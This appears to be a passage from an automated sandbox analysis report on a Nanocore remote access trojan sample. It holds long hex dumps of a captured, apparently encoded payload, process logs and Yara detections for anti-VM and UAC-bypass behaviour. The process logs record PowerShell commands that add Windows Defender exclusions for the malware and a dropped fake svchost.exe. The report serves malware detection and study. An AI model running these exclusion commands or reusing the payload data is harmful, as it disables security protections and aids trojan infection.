                    Data Ascii: 5 0 47 0 47 0 55 0 102 0 119 0 80 0 47 0 43 0 51 0 56 0 68 0 47 0 47 0 116 0 47 0 65 0 47 0 47 0 55 0 102 0 119 0 80 0 47 0 55 0 75 0 89 0 65 0 80 0 57 0 86 0 81 0 119 0 72 0 48 0 80 0 84 0 103 0 71 0 108 0 118 0 80 0 113 0 48 0 102 0 47 0 114 0 55 0 77 0
                    2021-10-26 16:59:46 UTC4991INData Raw: 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 31 31 34 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 34 20 30 20 31 31 37 20 30 20 35 37 20 30 20 34 37 20 30 20 34 33 20 30 20 35 37 20 30 20 31 31 35 20 30 20 37 32 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 36 20 30 20 31 31 32 20 30 20 36 38 20 30 20 34 37 20 30 20 31 32 30 20 30 20 31 31 35 20 30 20 38 30 20 30 20 36 37 20 30 20 37 32 20 30 20 31 32 31 20 30 20 34 38 20 30 20 31 30 38 20 30 20 39 37 20 30 20 31 30 36 20 30 20 34 37 20 30 20 31 31 37 20 30 20 39 38 20 30 20 31 32 31 20 30 20 35 34 20 30 20 34 37 20 30 20 35 37 20 30 20 37 32 20 30 20 38 36 20 30 20 34 38 20 30 20 34 37 20 30 20 34 37 20 30 20 37 35 20 30 20 31 31 37 20 30
                    Data Ascii: 7 0 47 0 47 0 49 0 100 0 114 0 106 0 47 0 43 0 114 0 117 0 57 0 47 0 43 0 57 0 115 0 72 0 102 0 47 0 100 0 86 0 112 0 68 0 47 0 120 0 115 0 80 0 67 0 72 0 121 0 48 0 108 0 97 0 106 0 47 0 117 0 98 0 121 0 54 0 47 0 57 0 72 0 86 0 48 0 47 0 47 0 75 0 117 0
                    2021-10-26 16:59:46 UTC5007INData Raw: 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 39 20 30 20 34 38 20 30 20 36 35 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 30 20 30 20 37 37 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 38 34 20 30
                    Data Ascii: 66 0 118 0 65 0 72 0 65 0 65 0 90 0 81 0 66 0 121 0 65 0 72 0 81 0 65 0 97 0 81 0 66 0 108 0 65 0 72 0 77 0 65 0 65 0 65 0 65 0 73 0 65 0 69 0 48 0 65 0 85 0 119 0 65 0 103 0 65 0 70 0 77 0 65 0 89 0 81 0 66 0 117 0 65 0 72 0 77 0 65 0 73 0 65 0 66 0 84 0
                    2021-10-26 16:59:46 UTC5023INData Raw: 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 35 30 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 38 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 30 20 30
                    Data Ascii: 90 0 81 0 66 0 117 0 65 0 72 0 81 0 65 0 73 0 65 0 66 0 50 0 65 0 71 0 69 0 65 0 99 0 103 0 66 0 112 0 65 0 71 0 69 0 65 0 89 0 103 0 66 0 115 0 65 0 71 0 85 0 65 0 99 0 119 0 65 0 103 0 65 0 71 0 107 0 65 0 98 0 103 0 66 0 122 0 65 0 71 0 107 0 65 0 90 0
                    2021-10-26 16:59:46 UTC5039INData Raw: 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 34 39 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 32 32 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 31 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 34 39 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 30
                    Data Ascii: 0 73 0 65 0 66 0 106 0 65 0 71 0 56 0 65 0 98 0 65 0 66 0 49 0 65 0 71 0 48 0 65 0 98 0 103 0 66 0 122 0 65 0 67 0 65 0 65 0 100 0 65 0 66 0 111 0 65 0 71 0 69 0 65 0 100 0 65 0 65 0 103 0 65 0 72 0 107 0 65 0 98 0 119 0 66 0 49 0 65 0 67 0 65 0 65 0 100
                    2021-10-26 16:59:46 UTC5055INData Raw: 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 35 30 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 38 20 30 20 37 33 20 30 20 36 35 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 38 20 30 20 37 37 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 38 31 20 30 20 36 35 20 30 20 38 38 20 30 20 36 35 20 30 20 37 30 20 30 20 39 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20
                    Data Ascii: 66 0 84 0 65 0 71 0 85 0 65 0 99 0 103 0 66 0 50 0 65 0 71 0 85 0 65 0 99 0 103 0 65 0 103 0 65 0 68 0 73 0 65 0 77 0 65 0 65 0 119 0 65 0 68 0 77 0 65 0 73 0 65 0 66 0 84 0 65 0 70 0 65 0 65 0 77 0 81 0 65 0 88 0 65 0 70 0 99 0 65 0 97 0 81 0 66 0 117 0
                    2021-10-26 16:59:46 UTC5071INData Raw: 20 30 20 31 32 30 20 30 20 31 32 32 20 30 20 31 30 30 20 30 20 38 38 20 30 20 36 36 20 30 20 31 31 39 20 30 20 39 38 20 30 20 35 31 20 30 20 37 34 20 30 20 34 38 20 30 20 39 30 20 30 20 38 37 20 30 20 38 32 20 30 20 38 30 20 30 20 38 35 20 30 20 31 32 31 20 30 20 36 36 20 30 20 37 34 20 30 20 39 30 20 30 20 36 38 20 30 20 34 38 20 30 20 31 30 35 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 37 37 20 30 20 34 39 20 30 20 37 37 20 30 20 38 34 20 30 20 37 37 20 30 20 35 32 20 30 20 38 39 20 30 20 31 30 36 20 30 20 31 30 38 20 30 20 31 30 34 20 30 20 37 36 20 30 20 38 34 20 30 20 38 36 20 30 20 31 30 37 20 30 20 37 39 20 30 20 38 34 20 30 20 38 39 20 30 20 31 31 36 20 30 20 37 38 20 30 20 37 31 20 30 20 39 30 20 30 20 31 30 35 20 30 20 39 30 20 30 20 36 37 20
                    Data Ascii: 0 120 0 122 0 100 0 88 0 66 0 119 0 98 0 51 0 74 0 48 0 90 0 87 0 82 0 80 0 85 0 121 0 66 0 74 0 90 0 68 0 48 0 105 0 101 0 122 0 77 0 49 0 77 0 84 0 77 0 52 0 89 0 106 0 108 0 104 0 76 0 84 0 86 0 107 0 79 0 84 0 89 0 116 0 78 0 71 0 90 0 105 0 90 0 67
                    2021-10-26 16:59:46 UTC5087INData Raw: 31 31 32 20 30 20 37 32 20 30 20 38 38 20 30 20 37 31 20 30 20 31 31 33 20 30 20 38 31 20 30 20 35 33 20 30 20 38 31 20 30 20 38 39 20 30 20 31 31 33 20 30 20 38 36 20 30 20 38 32 20 30 20 31 30 37 20 30 20 38 32 20 30 20 36 36 20 30 20 31 31 33 20 30 20 35 32 20 30 20 36 39 20 30 20 31 31 36 20 30 20 31 30 35 20 30 20 31 31 34 20 30 20 31 31 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 34 33 20 30 20 36 36 20 30 20 31 30 35 20 30 20 31 31 35 20 30 20 31 31 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 37 20 30 20 37 36 20 30 20 31 30 36 20 30 20 37 37 20 30 20 31 30 33 20 30 20 34 33 20 30 20 31 30 33 20 30 20 31 31 39 20 30 20 39 30 20 30 20 31 30 35 20 30 20 39 37 20 30 20 31 30 34 20 30 20 31 31 35 20 30 20 31 30 31 20 30 20 35 34 20 30 20 34 38 20
                    Data Ascii: 112 0 72 0 88 0 71 0 113 0 81 0 53 0 81 0 89 0 113 0 86 0 82 0 107 0 82 0 66 0 113 0 52 0 69 0 116 0 105 0 114 0 118 0 51 0 119 0 43 0 66 0 105 0 115 0 112 0 47 0 47 0 117 0 76 0 106 0 77 0 103 0 43 0 103 0 119 0 90 0 105 0 97 0 104 0 115 0 101 0 54 0 48
                    2021-10-26 16:59:46 UTC5103INData Raw: 37 37 20 30 20 36 37 20 30 20 31 31 31 20 30 20 37 31 20 30 20 36 35 20 30 20 34 39 20 30 20 38 35 20 30 20 36 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 31 30 36 20 30 20 38 35 20 30 20 35 30 20 30 20 38 36 20 30 20 31 30 36 20 30 20 31 30 30 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 30 20 30 20 39 38 20 30 20 31 32 31 20 30 20 36 36 20 30 20 38 33 20 30 20 38 35 20 30 20 34 38 20 30 20 36 39 20 30 20 31 30 33 20 30 20 38 36 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 36 20 30 20 39 30 20 30 20 38 33 20 30 20 36 36 20 30 20 38 34 20 30 20 31 30 30 20 30 20 37 31 20 30 20 37 30 20 30 20 31 31 36 20 30 20 39 39 20 30 20 37 31 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 39 30 20 30 20 31 32 31 20 30 20 36 36 20 30 20 38 34 20
                    Data Ascii: 77 0 67 0 111 0 71 0 65 0 49 0 85 0 69 0 65 0 119 0 119 0 106 0 85 0 50 0 86 0 106 0 100 0 71 0 108 0 110 0 98 0 121 0 66 0 83 0 85 0 48 0 69 0 103 0 86 0 71 0 108 0 116 0 90 0 83 0 66 0 84 0 100 0 71 0 70 0 116 0 99 0 71 0 108 0 117 0 90 0 121 0 66 0 84
                    2021-10-26 16:59:46 UTC5119INData Raw: 37 34 20 30 20 35 30 20 30 20 34 33 20 30 20 31 31 31 20 30 20 31 31 32 20 30 20 36 36 20 30 20 37 34 20 30 20 37 38 20 30 20 38 31 20 30 20 39 38 20 30 20 34 37 20 30 20 37 32 20 30 20 37 35 20 30 20 31 30 38 20 30 20 37 30 20 30 20 37 35 20 30 20 37 36 20 30 20 38 35 20 30 20 31 31 34 20 30 20 38 35 20 30 20 37 37 20 30 20 39 39 20 30 20 31 31 32 20 30 20 36 39 20 30 20 31 30 39 20 30 20 37 36 20 30 20 38 31 20 30 20 38 34 20 30 20 31 30 37 20 30 20 38 35 20 30 20 36 35 20 30 20 31 32 30 20 30 20 35 32 20 30 20 31 31 32 20 30 20 34 33 20 30 20 31 30 34 20 30 20 31 31 37 20 30 20 31 30 38 20 30 20 37 33 20 30 20 31 31 33 20 30 20 35 34 20 30 20 31 30 38 20 30 20 31 31 39 20 30 20 34 38 20 30 20 35 30 20 30 20 36 37 20 30 20 34 38 20 30 20 37 33 20 30 20
                    Data Ascii: 74 0 50 0 43 0 111 0 112 0 66 0 74 0 78 0 81 0 98 0 47 0 72 0 75 0 108 0 70 0 75 0 76 0 85 0 114 0 85 0 77 0 99 0 112 0 69 0 109 0 76 0 81 0 84 0 107 0 85 0 65 0 120 0 52 0 112 0 43 0 104 0 117 0 108 0 73 0 113 0 54 0 108 0 119 0 48 0 50 0 67 0 48 0 73 0
                    2021-10-26 16:59:46 UTC5135INData Raw: 30 20 31 31 36 20 30 20 33 37 20 30 20 31 32 30 20 30 20 31 30 30 20 30 20 31 31 38 20 30 20 31 31 34 20 30 20 31 31 38 20 30 20 31 31 36 20 30 20 31 32 31 20 30 20 33 37 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 31 36 20 30 20 31 31 37 20 30 20 31 31 36 20 30 20 31 31 31 20 30 20 31 30 32 20 30 20 31 30 36 20 30 20 31 30 31 20 30 20 39 38 20 30 20 31 31 38 20 30 20 31 31 31 20 30 20 31 32 31 20 30 20 31 30 33 20 30 20 39 39 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 31 32 20 30 20 33 37 20 30 20 31 31 30 20 30 20 31 31 31 20 30 20 39 37 20 30 20 31 30 31 20 30 20 31 31 38 20 30 20 31 31 32 20 30 20 31 30 37 20 30 20 31 31 39 20 30 20 31 31 34 20 30 20 31 31 34 20 30 20 31 31 34 20 30 20 39 39 20 30 20 31 30 32 20 30 20 33 37 20 30 20 33 32 20 30 20
                    Data Ascii: 0 116 0 37 0 120 0 100 0 118 0 114 0 118 0 116 0 121 0 37 0 111 0 37 0 116 0 117 0 116 0 111 0 102 0 106 0 101 0 98 0 118 0 111 0 121 0 103 0 99 0 111 0 37 0 112 0 37 0 110 0 111 0 97 0 101 0 118 0 112 0 107 0 119 0 114 0 114 0 114 0 99 0 102 0 37 0 32 0
                    2021-10-26 16:59:46 UTC5151INData Raw: 33 37 20 30 20 36 31 20 30 20 33 37 20 30 20 31 30 39 20 30 20 31 31 32 20 30 20 39 38 20 30 20 31 31 31 20 30 20 39 37 20 30 20 31 31 34 20 30 20 31 31 37 20 30 20 31 31 35 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 30 36 20 30 20 31 30 35 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 31 35 20 30 20 31 30 30 20 30 20 31 32 30 20 30 20 39 39 20 30 20 39 37 20 30 20 31 32 31 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 30 34 20 30 20 31 32 31 20 30 20 31 31 31 20 30 20 31 30 31 20 30 20 33 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 39 39 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 31 32 31 20 30 20 31 31 32 20 30 20 31 32 30 20 30 20
                    Data Ascii: 37 0 61 0 37 0 109 0 112 0 98 0 111 0 97 0 114 0 117 0 115 0 116 0 101 0 114 0 106 0 105 0 37 0 32 0 37 0 115 0 100 0 120 0 99 0 97 0 121 0 37 0 100 0 37 0 104 0 121 0 111 0 101 0 37 0 105 0 37 0 99 0 109 0 111 0 116 0 106 0 111 0 117 0 121 0 112 0 120 0
                    2021-10-26 16:59:46 UTC5167INData Raw: 20 33 37 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 39 37 20 30 20 33 37 20 30 20 31 31 32 20 30 20 33 37 20 30 20 39 39 20 30 20 31 31 31 20 30 20 31 31 32 20 30 20 31 31 38 20 30 20 39 38 20 30 20 31 31 32 20 30 20 31 31 36 20 30 20 31 31 36 20 30 20 31 30 36 20 30 20 31 32 31 20 30 20 31 30 34 20 30 20 33 37 20 30 20 33 32 20 30 20 33 37 20 30 20 31 30 38 20 30 20 31 32 31 20 30 20 31 30 37 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 36 20 30 20 33 37 20 30 20 38 37 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 31 33 20 30 20 31 30 35 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 31 36 20 30 20 31 30 39 20 30 20 31 30 34 20
                    Data Ascii: 37 0 104 0 101 0 120 0 97 0 37 0 112 0 37 0 99 0 111 0 112 0 118 0 98 0 112 0 116 0 116 0 106 0 121 0 104 0 37 0 32 0 37 0 108 0 121 0 107 0 115 0 105 0 116 0 37 0 87 0 37 0 118 0 113 0 105 0 116 0 101 0 106 0 122 0 37 0 100 0 37 0 118 0 116 0 109 0 104
                    2021-10-26 16:59:46 UTC5183INData Raw: 36 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 38 34 20 30 20 31 31 31 20 30 20 39 37 20 30 20 31 31 35 20 30 20 31 31 36 20 30 20 34 36 20 30 20 38 33 20 30 20 31 30 31 20 30 20 39 39 20 30 20 31 31 37 20 30 20 31 31 34 20 30 20 31 30 35 20 30 20 31 31 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 31 31 30 20 30 20 31 30 30 20 30 20 37 37 20 30 20 39 37 20 30 20 31 30 35 20 30 20 31 31 30 20 30 20 31 31 36 20 30 20 31 30 31 20 30 20 31 31 30 20 30 20 39 37 20 30 20 31 31 30 20 30 20 39 39 20 30 20 31 30 31 20 30 20 30 20 31 35 20 36 39 20 30 20 31 31 30 20 30 20 39 37 20 30 20 39 38 20 30 20 31 30 38 20 30 20 31 30 31 20 30 20 31 30 30 20 30 20 30 20 31 32 38 20 31 35 33 20 37 32 20 30 20 37 35 20 30 20 36 39 20 30 20 38 39 20 30 20 39 35 20 30 20 37 36
                    Data Ascii: 6 0 101 0 109 0 84 0 111 0 97 0 115 0 116 0 46 0 83 0 101 0 99 0 117 0 114 0 105 0 116 0 121 0 65 0 110 0 100 0 77 0 97 0 105 0 110 0 116 0 101 0 110 0 97 0 110 0 99 0 101 0 0 15 69 0 110 0 97 0 98 0 108 0 101 0 100 0 0 128 153 72 0 75 0 69 0 89 0 95 0 76
                    2021-10-26 16:59:46 UTC5199INData Raw: 32 39 20 35 20 32 20 32 20 32 20 32 20 32 20 32 20 32 20 32 20 31 38 20 31 32 35 20 35 20 30 20 31 20 38 20 31 38 20 31 30 39 20 34 20 30 20 31 20 39 20 38 20 32 20 36 20 31 34 20 32 20 36 20 32 34 20 36 20 30 20 32 20 38 20 32 39 20 35 20 38 20 33 20 30 20 30 20 38 20 36 20 30 20 32 20 36 20 32 39 20 35 20 38 20 31 32 20 30 20 35 20 31 20 31 38 20 31 32 38 20 32 32 35 20 38 20 31 38 20 31 32 38 20 32 32 35 20 38 20 38 20 35 20 30 20 31 20 32 39 20 35 20 38 20 34 20 30 20 31 20 38 20 39 20 36 20 30 20 31 20 31 38 20 31 32 38 20 31 32 39 20 38 20 35 20 30 20 31 20 31 20 31 38 20 31 32 35 20 33 20 30 20 30 20 31 20 34 20 30 20 31 20 31 20 38 20 35 20 37 20 33 20 32 34 20 32 34 20 32 34 20 34 20 30 20 31 20 32 34 20 38 20 31 39 20 37 20 31 37 20 38 20 38 20
                    Data Ascii: 29 5 2 2 2 2 2 2 2 2 18 125 5 0 1 8 18 109 4 0 1 9 8 2 6 14 2 6 24 6 0 2 8 29 5 8 3 0 0 8 6 0 2 6 29 5 8 12 0 5 1 18 128 225 8 18 128 225 8 8 5 0 1 29 5 8 4 0 1 8 9 6 0 1 18 128 129 8 5 0 1 1 18 125 3 0 0 1 4 0 1 1 8 5 7 3 24 24 24 4 0 1 24 8 19 7 17 8 8
                    2021-10-26 16:59:46 UTC5215INData Raw: 20 34 38 20 30 20 34 36 20 30 20 34 38 20 30 20 34 36 20 30 20 34 38 20 30 20 30 20 30 20 35 36 20 30 20 38 20 30 20 31 20 30 20 36 35 20 30 20 31 31 35 20 30 20 31 31 35 20 30 20 31 30 31 20 30 20 31 30 39 20 30 20 39 38 20 30 20 31 30 38 20 30 20 31 32 31 20 30 20 33 32 20 30 20 38 36 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 30 20 30 20 34 39 20 30 20 34 36 20 30 20 34 38 20 30 20 34 36 20 30 20 34 38 20 30 20 34 36 20 30 20 34 38 20 30 20 30 20 30 20 32 33 39 20 31 38 37 20 31 39 31 20 36 30 20 36 33 20 31 32 30 20 31 30 39 20 31 30 38 20 33 32 20 31 31 38 20 31 30 31 20 31 31 34 20 31 31 35 20 31 30 35 20 31 31 31 20 31 31 30 20 36 31 20 33 34 20 34 39 20 34 36 20 34 38 20 33
                    Data Ascii: 48 0 46 0 48 0 46 0 48 0 0 0 56 0 8 0 1 0 65 0 115 0 115 0 101 0 109 0 98 0 108 0 121 0 32 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 239 187 191 60 63 120 109 108 32 118 101 114 115 105 111 110 61 34 49 46 48 3


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:19:00:06
                    Start date:26/10/2021
                    Path:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\user\Desktop\p9Ts9VV2NZ.exe'
                    Imagebase:0x1e0000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.341425610.0000000003531000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.346751423.0000000003955000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.346751423.0000000003955000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.354707047.0000000004530000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.354707047.0000000004530000.00000004.00020000.sdmp, Author: Joe Security
                    Reputation:low

                    General

                    Start time:19:00:11
                    Start date:26/10/2021
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                    Imagebase:0xee0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Start time:19:00:11
                    Start date:26/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:19:00:11
                    Start date:26/10/2021
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\p9Ts9VV2NZ.exe' -Force
                    Imagebase:0xee0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Start time:19:00:12
                    Start date:26/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:19:00:12
                    Start date:26/10/2021
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
                    Imagebase:0xee0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Start time:19:00:12
                    Start date:26/10/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:19:00:15
                    Start date:26/10/2021
                    Path:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Imagebase:0x2d0000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:19:00:16
                    Start date:26/10/2021
                    Path:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Imagebase:0x70000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    General

                    Start time:19:00:16
                    Start date:26/10/2021
                    Path:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    Imagebase:0xc00000
                    File size:12288 bytes
                    MD5 hash:0475ED517DA8A71BC4A87F14A44CF8FE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, Author: Joe Security
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmp, Author: Florian Roth
